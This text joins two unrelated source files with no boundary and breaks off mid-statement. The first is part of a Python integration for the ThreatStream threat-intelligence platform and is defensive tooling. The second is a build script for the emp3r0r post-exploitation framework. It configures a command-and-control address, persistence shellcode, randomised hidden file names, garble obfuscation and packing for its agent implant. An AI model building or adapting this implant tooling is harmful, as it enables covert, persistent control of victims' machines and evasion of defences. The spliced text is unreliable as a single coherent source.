FeedIndicatorType.IP, RELATIONSHIPS_MAPPING.get('ip'), ) # create the IP instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('ip') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} dbot_score = Common.DBotScore( ip, DBotScoreType.IP, THREAT_STREAM, score=score_calc.calculate_score(DBotScoreType.IP, indicator, threshold), reliability=client.reliability, ) ip_indicator = Common.IP( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.IP', outputs_key_field='Address', indicator=ip_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def domains_reputation_command(client: Client, score_calc: DBotScoreCalculator, domain, status, threshold=None): """ Wrapper function for get_domain_reputation. """ results = [] # type: ignore domains = argToList(domain, ',') for single_domain in domains: results.append(get_domain_reputation(client, score_calc, single_domain, status, threshold)) return results def get_domain_reputation(client: Client, score_calc: DBotScoreCalculator, domain, status, threshold=None): """ Checks the reputation of given domain from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = dict(value=domain, type=DBotScoreType.DOMAIN, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=domain) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'Domain reputation for: {domain}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.Domain, RELATIONSHIPS_MAPPING.get('domain'), ) # create the Domain instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('domain') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} geo_location = f"{indicator.get('latitude')},{indicator.get('longitude')}" if indicator.get('latitude') else None dbot_score = Common.DBotScore( domain, DBotScoreType.DOMAIN, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.DOMAIN, indicator, threshold), ) domain_indicator = Common.Domain( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], geo_location=geo_location, relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Domain', outputs_key_field='Address', indicator=domain_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def files_reputation_command(client: Client, score_calc: DBotScoreCalculator, file, status, threshold=None): """ Wrapper function for get_file_reputation. """ results = [] files = argToList(file, ',') for single_file in files: results.append(get_file_reputation(client, score_calc, single_file, status, threshold)) return results def get_file_reputation(client: Client, score_calc: DBotScoreCalculator, file, status, threshold=None): """ Checks the reputation of given hash of the file from ThreatStream and returns the indicator with highest severity score. """ # get the indicator params = dict(value=file, type="md5", status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=file) # save the hash value under the hash type key threat_context = get_generic_threat_context(indicator, indicator_mapping=FILE_INDICATOR_MAPPING) file_type: str = indicator.get('subtype') # The real type of the hash is in subtype field. if file_type: threat_context[file_type] = indicator.get('value') # Convert the tags objects into s string for the human readable. tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'File reputation for: {file}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.File, RELATIONSHIPS_MAPPING.get('file'), ) # create the File instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('file') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} if file_type: kwargs[file_type.lower()] = threat_context[file_type] dbot_score = Common.DBotScore( file, DBotScoreType.FILE, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.FILE, indicator, threshold), ) file_indicator = Common.File( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.{Common.File.CONTEXT_PATH}', indicator=file_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def urls_reputation_command(client: Client, score_calc: DBotScoreCalculator, url, status, threshold=None): """ Wrapper function for get_url_reputation. """ results = [] urls = argToList(url, ',') for single_url in urls: results.append(get_url_reputation(client, score_calc, single_url, status, threshold)) return results def get_url_reputation(client: Client, score_calc: DBotScoreCalculator, url, status, threshold=None): """ Checks the reputation of given url address from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = dict(value=url, type=DBotScoreType.URL, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=url) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'URL reputation for: {url}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.URL, RELATIONSHIPS_MAPPING.get('url'), ) # create the URL instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('url') # type: ignore kwargs = {arg: demisto.get(indicator, key_in_indicator) for (arg, key_in_indicator) in args_to_keys_map.items()} dbot_score = Common.DBotScore( url, DBotScoreType.URL, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.URL, indicator, threshold), ) url_indicator = Common.URL( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.URL', outputs_key_field='Address', indicator=url_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def get_email_reputation(client: Client, score_calc: DBotScoreCalculator, email, status, threshold=None): """ Checks the reputation of given email address from ThreatStream and returns the indicator with highest confidence score. """ params = dict(value=email, type=DBotScoreType.EMAIL, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=email) threat_context = get_generic_threat_context(indicator) threat_context['Email'] = threat_context.pop('Address') threat_context.pop('ASN', None) threat_context.pop('Organization', None) threat_context.pop('Country', None) # Convert the tags objects into s string for the human readable. tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'Email reputation for: {email}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.Email, RELATIONSHIPS_MAPPING.get('email'), ) dbot_score = Common.DBotScore( email, DBotScoreType.EMAIL, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.EMAIL, indicator, threshold), ) # create the EMAIL instance email_indicator = Common.EMAIL( dbot_score=dbot_score, address=threat_context['Email'], relationships=relationships, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.EmailReputation', outputs_key_field='Email', indicator=email_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def get_passive_dns(client: Client, value, type=DBotScoreType.IP, limit=50): """ Receives value and type of indicator and returns enrichment data for domain or ip. """ dns_results = client.http_request("GET", F"v1/pdns/{type}/{value}/").get('results', None) if not dns_results: return f'No Passive DNS enrichment data found for {value}' dns_results = dns_results[:int(limit)] output = camelize(dns_results, delim='_') human_readable = tableToMarkdown(f'Passive DNS enrichment data for: {value}', output) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.PassiveDNS', readable_output=human_readable, outputs=output, raw_response=dns_results, ) def import_ioc_with_approval(client: Client, import_type, import_value, confidence="50", classification="Private", threat_type="exploit", severity="low", ip_mapping=None, domain_mapping=None, url_mapping=None, email_mapping=None, md5_mapping=None): """ Imports indicators data to ThreatStream. The data can be imported using one of three import_types: data-text (plain-text), file-id of uploaded file to war room or URL. """ # prepare data = assign_params( classification=classification, confidence=int(confidence), ip_mapping=ip_mapping, domain_mapping=domain_mapping, url_mapping=url_mapping, email_mapping=email_mapping, md5_mapping=md5_mapping, threat_type=threat_type, severity=severity, ) files = None uploaded_file = None if import_type == 'file-id': try: # import_value should be entry id of uploaded file in war room file_info = demisto.getFilePath(import_value) except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {import_value} does not contain a file.') uploaded_file = open(file_info['path'], 'rb') files = {'file': (file_info['name'], uploaded_file)} else: data[import_type] = import_value # request res = client.http_request("POST", "v1/intelligence/import/", data=data, files=files) # closing the opened file if exist if uploaded_file: uploaded_file.close() # checking that response contains success key if res.get('success', False): imported_id = res.get('import_session_id', '') readable_output = f'The data was imported successfully. The ID of imported job is: {imported_id}' return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Import.ImportID', outputs_key_field='ImportID', outputs=imported_id, readable_output=readable_output, raw_response=res, ) else: raise DemistoException('The data was not imported. Check if valid arguments were passed') def import_ioc_without_approval(client: Client, file_id, classification, confidence=None, allow_unresolved='no', source_confidence_weight=None, expiration_ts=None, severity=None, tags=None, trustedcircles=None): """ Imports indicators data to ThreatStream. file_id of uploaded file to war room. """ if tags: tags = argToList(tags) if trustedcircles: trustedcircles = argToList(trustedcircles) try: # entry id of uploaded file to war room file_info = demisto.getFilePath(file_id) with open(file_info['path'], 'rb') as uploaded_file: ioc_to_import = json.load(uploaded_file) except json.JSONDecodeError: raise DemistoException(f'{THREAT_STREAM} - Entry {file_id} does not contain a valid json file.') except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {file_id} does not contain a file.') ioc_to_import.update({'meta': assign_params( classification=classification, confidence=confidence, allow_unresolved=argToBoolean(allow_unresolved), source_confidence_weight=source_confidence_weight, expiration_ts=expiration_ts, severity=severity, tags=tags, trustedcircles=trustedcircles )}) client.http_request("PATCH", "v1/intelligence/", json=ioc_to_import, resp_type='text') return "The data was imported successfully." def get_model_list(client: Client, model, limit="50"): """ Returns list of Threat Model that was specified. By default limit is set to 50 results. Possible values for model are : actor, campaign, incident, signature, ttp, vulnerability, tipreport """ # if limit=0 don't put to context params = dict(limit=limit, skip_intelligence="true", skip_associations="true") model_list = client.http_request("GET", F"v1/{model}/", params=params).get('objects', None) if not model_list: return f'No Threat Model {model.title()} found.' model_type = model.title() models_context = [ { 'Name': threat_model.get('name'), 'ID': threat_model.get('id'), 'CreatedTime': threat_model.get('created_ts'), 'Type': model_type } for threat_model in model_list ] # in case that no limit was passed, the stage of set to context is skipped readable_output = tableToMarkdown(f"List of {model.title()}s", models_context) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.List', outputs_key_field='ID', outputs=models_context if limit != '0' else None, readable_output=readable_output, raw_response=model_list ) def get_model_description(client: Client, model, id): """ Returns a description of Threat Model as html file to the war room. """ params = dict(skip_intelligence="true", skip_associations="true") response = client.http_request("GET", F"v1/{model}/{id}", params=params, resp_type='response') if response.status_code == 404: return f'No description found for Threat Model {model.title()} with id {id}' description = response.json() if model == 'signature': description = description.get('notes', '') elif model == 'tipreport': description = description.get('body', '') else: description = description.get('description', None) return fileResult(F"{model}_{id}.html", description.encode(encoding='UTF-8')) def get_iocs_by_model(client: Client, model, id, limit="20"): """ Returns list of indicators associated with specific Threat Model by model id. """ params = dict(limit=limit) model_type = model.title() response = client.http_request("GET", F"v1/{model}/{id}/intelligence/", params=params, resp_type='response') if response.status_code == 404: return f'No indicators found for Threat Model {model_type} with id {id}' iocs_list = response.json().get('objects', None) model_type = model.title() iocs_context = parse_indicators_list(iocs_list) outputs = { 'ModelType': model_type, 'ModelID': id, 'Indicators': iocs_context } readable_output = tableToMarkdown(f'Indicators list for Threat Model {model_type} with id {id}', iocs_context) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Model', outputs_key_field=['ModelID', 'ModelType'], outputs=outputs, readable_output=readable_output, raw_response=iocs_list ) def create_model(client: Client, model, name, is_public="false", tlp=None, tags=None, intelligence=None, description=None): """ Creates Threat Model with basic parameters. """ data = build_model_data(model, name, is_public, tlp, tags, intelligence, description) model_id = client.http_request("POST", F"v1/{model}/", data=json.dumps(data)).get('id', None) if model_id: return get_iocs_by_model(client, model, model_id, limit="50") else: raise DemistoException(f'{model.title()} Threat Model was not created. Check the input parameters') def update_model(client: Client, model, model_id, name=None, is_public="false", tlp=None, tags=None, intelligence=None, description=None): """ Updates a ThreatStream model with parameters. In case one or more optional parameters are defined, the previous data is overridden. """ data = build_model_data(model, name, is_public, tlp, tags, intelligence, description) client.http_request("PATCH", F"v1/{model}/{model_id}/", data=json.dumps(data)) return get_iocs_by_model(client, model, model_id, limit="50") def get_supported_platforms(client: Client, sandbox_type="default"): """ Returns list of supported platforms for premium sandbox or default sandbox. """ platform_data = client.http_request("GET", "v1/submit/parameters/") result_key = 'platform_choices' if sandbox_type == 'default' else 'premium_platform_choices' available_platforms = platform_data.get(result_key, []) if not available_platforms: return f'No supported platforms found for {sandbox_type} sandbox' output = camelize(available_platforms) outputs_prefix = 'DefaultPlatforms' if sandbox_type == 'default' else 'PremiumPlatforms' return CommandResults( outputs_prefix=f'{THREAT_STREAM}.{outputs_prefix}', outputs=output, readable_output=tableToMarkdown(f'Supported platforms for {sandbox_type} sandbox', output), raw_response=platform_data ) def get_submission_status(client: Client, report_id, output_as_command_result=True): """ Returns the sandbox submission status. If status is not received in report_info then status is set to done. Receives boolean flag that indicates if result should be as command result. By default the output boolean is set to True. """ response = client.http_request("GET", F"v1/submit/{report_id}/", resp_type='response') if response.status_code == 404: return f'No report found with id {report_id}' report_info = response.json() status = report_info.get('status', "done") verdict = report_info.get('verdict', '').title() platform = report_info.get('platform', '') if output_as_command_result: report_outputs = {'ReportID': report_id, 'Status': status, 'Platform': platform, 'Verdict': verdict} readable_output = tableToMarkdown(f'The analysis status for id {report_id}', report_outputs) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs_key_field='ReportID', outputs=report_outputs, readable_output=readable_output, raw_response=report_info, ) else: return status, verdict def file_name_to_valid_string(file_name): """ Demoji the file name if it's contain emoji """ if emoji.emoji_count(file_name): # type: ignore return emoji.demojize(file_name) # type: ignore return file_name def submit_report(client: Client, submission_type, submission_value, submission_classification="private", report_platform="WINDOWS7", premium_sandbox="false", detail=None): """ Detonates URL or file that was uploaded to war room to ThreatStream sandbox. """ data = { 'report_radio-classification': submission_classification, 'report_radio-platform': report_platform, 'use_premium_sandbox': premium_sandbox, } if detail: data['detail'] = detail uploaded_file = None files = None if submission_type == 'file': # submission_value should be entry id of uploaded file in war room try: file_info = demisto.getFilePath(submission_value) except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {submission_value} does not contain a file.') uploaded_file = open(file_info['path'], 'rb') file_name = file_name_to_valid_string(file_info.get('name')) files = {'report_radio-file': (file_name, uploaded_file)} else: data['report_radio-url'] = submission_value submit_res = client.http_request("POST", "v1/submit/new/", data=data, files=files) # closing the opened file if exist if uploaded_file: uploaded_file.close() if argToBoolean(submit_res.get('success', 'false')): report_info = submit_res['reports'][report_platform] report_id = report_info['id'] report_status, _ = get_submission_status(client, report_id, False) report_outputs = {'ReportID': report_id, 'Status': report_status, 'Platform': report_platform} readable_output = tableToMarkdown(f'The submission info for {submission_value}', report_outputs) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs=report_outputs, readable_output=readable_output, raw_response=report_info, ) else: raise DemistoException(f'The submission of {submission_value} failed') def get_report(client: Client, report_id): """ Returns the report from ThreatStream sandbox by id. """ response = client.http_request('GET', f'v1/submit/{report_id}/report', resp_type='response') if response.status_code == 404: return f'No report found with id {report_id}' report = response.json() report_results = report.get('results', {}) if report_results: info = parse_info(report_results.get('info', {})) info['ReportID'] = report_id _, info['Verdict'] = get_submission_status(client, report_id, False) readable_output = tableToMarkdown(f'Report {report_id} analysis results', info) # ignore 'networks' from the readable output info['Network'] = parse_network_lists(report_results.get('network', {})) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs_key_field='ReportID', outputs=info, readable_output=readable_output, raw_response=report ) def add_tag_to_model(client: Client, model_id, tags, model="intelligence"): """ Adds tag to specific Threat Model. By default is set to intelligence (indicators). """ tags = argToList(tags) data = { 'tags': [{'name': t, 'tlp': 'red'} for t in tags] } res = client.http_request("POST", F"v1/{model}/{model_id}/tag/", data=json.dumps(data)) if argToBoolean(res.get('success', 'false')): return f'Added successfully tags: {tags} to {model} with {model_id}' else: raise DemistoException(f'Failed to add {tags} to {model} with {model_id}') def get_indicators(client: Client, **kwargs): """ Returns filtered indicators by parameters from ThreatStream. By default the limit of indicators result is set to 20. """ limit = kwargs['limit'] = int(kwargs.get('limit', 20)) offset = kwargs['offset'] = 0 url = "v2/intelligence/" if 'query' in kwargs: url += f"?{kwargs.pop('query')}" iocs_list = client.http_request("GET", url, params=kwargs).get('objects', None) if not iocs_list: return 'No indicators found from ThreatStream' iocs_context = parse_indicators_list(iocs_list) # handle the issue that the API does not return more than 1000 indicators. if limit > 1000: while len(iocs_context) < limit: offset += len(iocs_list) kwargs['limit'] = limit kwargs['offset'] = offset iocs_list = client.http_request("GET", "v2/intelligence/", params=kwargs).get('objects', None) if iocs_list: iocs_context.extend(parse_indicators_list(iocs_list)) else: break return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Indicators', outputs=iocs_context, readable_output=tableToMarkdown("The indicators results", iocs_context), raw_response=iocs_list ) def main(): """ Initiate integration command """ command = demisto.command() LOG(f'Command being called is {command}') params = demisto.params() # init credentials user_name = params.get('credentials', {}).get('identifier') api_key = params.get('credentials', {}).get('password') server_url = params.get('url', '').strip('/') reliability = params.get('integrationReliability', DBotScoreReliability.B) if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("Please provide a valid value for the Source Reliability parameter.") commands = { # reputation commands 'ip': ips_reputation_command, 'domain': domains_reputation_command, 'file': files_reputation_command, 'url': urls_reputation_command, 'threatstream-email-reputation': get_email_reputation, 'threatstream-import-indicator-with-approval': import_ioc_with_approval, 'threatstream-import-indicator-without-approval': import_ioc_without_approval, 'threatstream-get-analysis-status': get_submission_status, 'threatstream-get-passive-dns': get_passive_dns, 'threatstream-get-model-list': get_model_list, 'threatstream-get-model-description': get_model_description, 'threatstream-get-indicators-by-model': get_iocs_by_model, 'threatstream-get-indicators': get_indicators, 'threatstream-supported-platforms': get_supported_platforms, 'threatstream-analysis-report': get_report, 'threatstream-create-model': create_model, 'threatstream-update-model': update_model, 'threatstream-submit-to-sandbox': submit_report, 'threatstream-add-tag-to-model': add_tag_to_model, } try: client = Client( base_url=f'{server_url}/api/', user_name=user_name, api_key=api_key, verify=not params.get('insecure', False), proxy=params.get('proxy', False), reliability=reliability, should_create_relationships=params.get('create_relationships', True), ) args = prepare_args(demisto.args(), command, params) if command == 'test-module': result = test_module(client) elif command in REPUTATION_COMMANDS: result = commands[command](client, DBotScoreCalculator(params), **args) # type: ignore else: result = commands[command](client, **args) # type: ignore return_results(result) except Exception as err: return_error(f'{str(err)}, traceback {traceback.format_exc()}') # python2 uses __builtin__ python3 uses builtins if __name__ in ("builtins", "__builtin__", "__main__"): main()
#!/usr/bin/env python3 # pylint: disable=invalid-name, too-many-branches, too-many-statements, broad-except, too-many-arguments, too-many-instance-attributes, line-too-long ''' this script replaces build.sh, coz bash/sed/awk is driving me insane ''' import argparse import atexit import glob import json import os import random import readline import shutil import subprocess import sys import tempfile import traceback import uuid class GoBuild: ''' all-in-one builder ''' def __init__(self, target="cc", cc_indicator="cc_indicator", cc_ip="[cc_ipaddr]", cc_other_names=""): self.target = target self.GOOS = os.getenv("GOOS") self.GOARCH = os.getenv("GOARCH") if self.GOOS is None: self.GOOS = "linux" if self.target == "agentw": self.GOOS = "windows" if self.GOARCH is None: self.GOARCH = "amd64" # CA self.CA = "" # tags self.CCIP = cc_ip self.CC_OTHER_NAMES = cc_other_names self.INDICATOR = cc_indicator self.UUID = str(uuid.uuid1()) self.VERSION = get_version() # webroot if 'webroot' in CACHED_CONF: self.WebRoot = CACHED_CONF['webroot'] else: self.WebRoot = str(uuid.uuid1()) CACHED_CONF['webroot'] = self.WebRoot # OpSep if 'opsep' in CACHED_CONF: self.OpSep = CACHED_CONF['opsep'] else: self.OpSep = str(uuid.uuid1()) CACHED_CONF['opsep'] = self.OpSep # pid file name if 'pid_file' in CACHED_CONF: self.PIDFile = CACHED_CONF['pid_file'] else: self.PIDFile = rand_str(random.randint(3, 10)) CACHED_CONF['pid_file'] = self.PIDFile # util path name if 'utils_path' in CACHED_CONF: self.UtilsPath = CACHED_CONF['utils_path'] else: self.UtilsPath = rand_str(random.randint(3, 10)) CACHED_CONF['utils_path'] = self.UtilsPath # socket name if 'socket' in CACHED_CONF: self.Socket = CACHED_CONF['socket'] else: self.Socket = rand_str(random.randint(3, 10)) CACHED_CONF['socket'] = self.Socket # indicator text if 'indicator_text' in CACHED_CONF: self.INDICATOR_TEXT = CACHED_CONF['indicator_text'] else: self.INDICATOR_TEXT = "emp3r0r" CACHED_CONF['indicator_text'] = self.INDICATOR_TEXT # agent root directory if "agent_root" in CACHED_CONF: self.AgentRoot = CACHED_CONF['agent_root'] else: # by default mkdir in current directory self.AgentRoot = f"{rand_str(random.randint(5, 10))}" CACHED_CONF['agent_root'] = self.AgentRoot # DoH if "doh_server" not in CACHED_CONF: CACHED_CONF['doh_server'] = "" # agent proxy if "agent_proxy" not in CACHED_CONF: CACHED_CONF['agent_proxy'] = "" # cdn proxy if "cdn_proxy" not in CACHED_CONF: CACHED_CONF['cdn_proxy'] = "" def build(self): ''' cd to cmd and run go build ''' self.gen_certs() # CA if 'ca' in CACHED_CONF: log_warn( f"Using cached CA cert ({CACHED_CONF["ca"]}),\nmake sure you have the coresponding keypair signed by it") self.CA = CACHED_CONF['ca'] else: f = open("./tls/rootCA.crt") self.CA = f.read() f.close() # cache CA, too CACHED_CONF['ca'] = self.CA # cache version CACHED_CONF['version'] = self.VERSION # write cached configs json_file = open(BUILD_JSON, "w+") json.dump(CACHED_CONF, json_file, indent=4) json_file.close() self.set_tags() # copy the server/cc keypair to ./build for later use if os.path.isdir("./tls"): log_warn("[*] Copying CC keypair to ./build") for f in glob.glob("./tls/emp3r0r-*pem"): print(f" Copy {f} to ./build") shutil.copy(f, "./build") try: os.chdir(f"./cmd/{self.target}") except BaseException: log_error(f"Cannot cd to cmd/{self.target}") return log_warn("GO BUILD starts...") build_target = f"../../build/{self.target}" if self.target == "agent": build_target = f"../../build/{self.target}-{self.UUID}" elif self.target == "agentw": build_target = f"../../build/{self.target}-{self.UUID}.exe" # go mod os.system('go mod tidy') cmd = f'''GOOS={self.GOOS} GOARCH={self.GOARCH} CGO_ENABLED=0''' + \ f""" go build -o {build_target} -ldflags='-s -w' -trimpath""" # garble if shutil.which("garble") and self.target != "cc" and args.garble: cmd = f'''GOOS={self.GOOS} GOARCH={self.GOARCH} CGO_ENABLED=0 GOPRIVATE=''' + \ f''' garble -literals -tiny build -o {build_target} -ldflags="-v" -trimpath .''' os.system(cmd) log_warn("GO BUILD ends...") os.chdir("../../") self.unset_tags() targetFile = f"./build/{build_target.split("/")[-1]}" if os.path.exists(targetFile): log_warn(f"{targetFile} generated") else: log_error("go build failed") sys.exit(1) # pack agent binary with packer if self.target == "agent" and args.pack: shutil.copy(targetFile, "../packer/agent") os.chdir("../packer") os.system("bash ./build.sh") os.system("CGO_ENABLED=0 ./cryptor.exe") shutil.move("agent.packed.exe", f"../core/{targetFile}") os.chdir("../core") os.chmod(targetFile, 0o755) log_warn(f"{targetFile} packed") def gen_certs(self): ''' generate server cert/key, and CA if necessary ''' if "ccip" in CACHED_CONF: if self.CCIP == CACHED_CONF['ccip'] and os.path.exists("./build/emp3r0r-key.pem"): return log_warn("[!] Generating new certs...") try: os.chdir("./tls") os.system( f"bash ./genkey-with-ip-san.sh {self.UUID} {self.UUID}.com {self.CCIP} {self.CC_OTHER_NAMES}") os.rename(f"./{self.UUID}-cert.pem", "./emp3r0r-cert.pem") os.rename(f"./{self.UUID}-key.pem", "./emp3r0r-key.pem") os.chdir("..") except BaseException as exc: log_error( f"[-] Something went wrong, see above for details: {exc}") sys.exit(1) def set_tags(self): ''' modify some tags in the source ''' # backup source file try: shutil.copy("./lib/tun/tls.go", "/tmp/tls.go") shutil.copy("./lib/tun/api.go", "/tmp/api.go") shutil.copy("./lib/data/def.go", "/tmp/def.go") except BaseException: log_error(f"Failed to backup source files:\n{traceback.format_exc()}") sys.exit(1) # version sed("./lib/data/def.go", '''Version = "[version_string]"''', f'''Version = "{self.VERSION}"''') if self.target == "agent": # guardian shellcode sed("./lib/data/def.go", "[persistence_shellcode]", CACHED_CONF['guardian_shellcode']) sed("./lib/data/def.go", "[persistence_agent_path]", CACHED_CONF['guardian_agent_path']) # CA sed("./lib/tun/tls.go", "[emp3r0r_ca]", self.CA) # webroot sed("./lib/tun/api.go", 'WebRoot = "emp3r0r"', f'WebRoot = "{self.WebRoot}"') # opsep sed("./lib/data/def.go", '''OpSep = "cb433bd1-354c-4802-a4fa-ece518f3ded1"''', f'''OpSep = "{self.OpSep}"''') # Socket name sed("./lib/data/def.go", '''SocketName = AgentRoot + "/.socket"''', f'''SocketName = AgentRoot + "/{self.Socket}"''') # utils path sed("./lib/data/def.go", '''UtilsPath = AgentRoot + "/bin"''', f'''UtilsPath = AgentRoot + "/{self.UtilsPath}"''') # PID file name sed("./lib/data/def.go", '''PIDFile = AgentRoot + "/.pid"''', f'''PIDFile = AgentRoot + "/{self.PIDFile}"''') # CC IP sed("./lib/data/def.go", "CCAddress = \"https://[cc_ipaddr]\"", f"CCAddress = \"https://{self.CCIP}\"") # agent root path sed("./lib/data/def.go", "AgentRoot = \"[agent_root]\"", f"AgentRoot = \"{self.AgentRoot}\"") # indicator sed("./lib/data/def.go", "CCIndicator = \"[cc_indicator]\"", f"CCIndicator = \"{self.INDICATOR}\"") # indicator wait if 'indicator_wait_min' in CACHED_CONF: sed("./lib/data/def.go", "IndicatorWaitMin = 30", f"IndicatorWaitMin = {CACHED_CONF["indicator_wait_min"]}") if 'indicator_wait_max' in CACHED_CONF: sed("./lib/data/def.go", "IndicatorWaitMax = 120", f"IndicatorWaitMax = {CACHED_CONF["indicator_wait_max"]}") # broadcast_interval if 'broadcast_interval_min' in CACHED_CONF: sed("./lib/data/def.go", "BroadcastIntervalMin = 30", f"BroadcastIntervalMin = {CACHED_CONF["broadcast_interval_min"]}") if 'broadcast_interval_max' in CACHED_CONF: sed("./lib/data/def.go", "BroadcastIntervalMax = 120", f"BroadcastIntervalMax = {CACHED_CONF["broadcast_interval_max"]}") # cc indicator text sed("./lib/data/def.go", "CCIndicatorText = \"[indicator_text]\"", f"CCIndicatorText = \"{self.INDICATOR_TEXT}\"") # agent UUID sed("./lib/data/def.go", "AgentUUID = \"[agent_uuid]\"", f"AgentUUID = \"{self.UUID}\"") # DoH sed("./lib/data/def.go", "DoHServer = \"\"", f"DoHServer = \"{CACHED_CONF["doh_server"]}\"") # CDN sed("./lib/data/def.go", "CDNProxy = \"\"", f"CDNProxy = \"{CACHED_CONF["cdn_proxy"]}\"") # Agent Proxy sed("./lib/data/def.go", "AgentProxy = \"\"", f"AgentProxy = \"{CACHED_CONF["agent_proxy"]}\"") # ports sed("./lib/data/def.go", "CCPort = \"[cc_port]\"", f"CCPort = \"{CACHED_CONF["cc_port"]}\"") sed("./lib/data/def.go", "SSHDPort = \"[sshd_port]\"", f"SSHDPort = \"{CACHED_CONF["sshd_port"]}\"") sed("./lib/data/def.go", "ProxyPort = \"[proxy_port]\"", f"ProxyPort = \"{CACHED_CONF["proxy_port"]}\"") sed("./lib/data/def.go", "BroadcastPort = \"[broadcast_port]\"", f"BroadcastPort = \"{CACHED_CONF["broadcast_port"]}\"") def unset_tags(self): # restore source files try: shutil.move("/tmp/def.go", "./lib/data/def.go") shutil.move("/tmp/tls.go", "./lib/tun/tls.go") shutil.move("/tmp/api.go", "./lib/tun/api.go") except BaseException: log_error(traceback.format_exc()) def clean(): ''' clean build output ''' to_rm = glob.glob("./tls/emp3r0r*") + glob.glob("./tls/openssl-*") + \ glob.glob("./build/*") + glob.glob("./tls/*.csr") for f in to_rm: try: # remove directories too if os.path.isdir(f): os.system(f"rm -rf {f}") else: # we don't need to delete the config file if f.endswith("build.json"): continue os.remove(f) print(" Deleted "+f) except BaseException: log_error(traceback.format_exc) def sed(path, old, new): ''' works like `sed -i s/old/new/g file` ''' rf = open(path) text = rf.read() to_write = text.replace(old, new) rf.close() f = open(path, "w") f.write(to_write) f.close() def yes_no(prompt): ''' y/n? ''' if yes_to_all: log_warn(f"Choosing 'yes' for '{prompt}'") return True answ = input(prompt + " [Y/n] ").lower().strip() if answ in ["n", "no", "nah", "nay"]: return False return True def rand_str(length): ''' random string ''' uuidstr = str(uuid.uuid4()).replace('-', '') # we don't want the string to be long if length >= len(uuidstr): return uuidstr return uuidstr[:length] def main(target): ''' main main main ''' ccip = "" indicator = "" use_cached = False if target == "clean": clean() return # cc IP if "ccip" in CACHED_CONF: ccip = CACHED_CONF['ccip'] use_cached = yes_no(f"Use cached CC address ({ccip})?") if not use_cached: if yes_no("Clean everything and start over?"): clean() ccip = input( "CC server address (domain name or ip address, can be more than one, separate with space):\n> ").strip() CACHED_CONF['ccip'] = ccip if len(ccip.split()) > 1: CACHED_CONF['ccip'] = ccip.split()[0] if target == "cc": cc_other = "" if len(ccip.split()) > 1: cc_other = ' '.join(ccip[1:]) gobuild = GoBuild(target="cc", cc_ip=ccip, 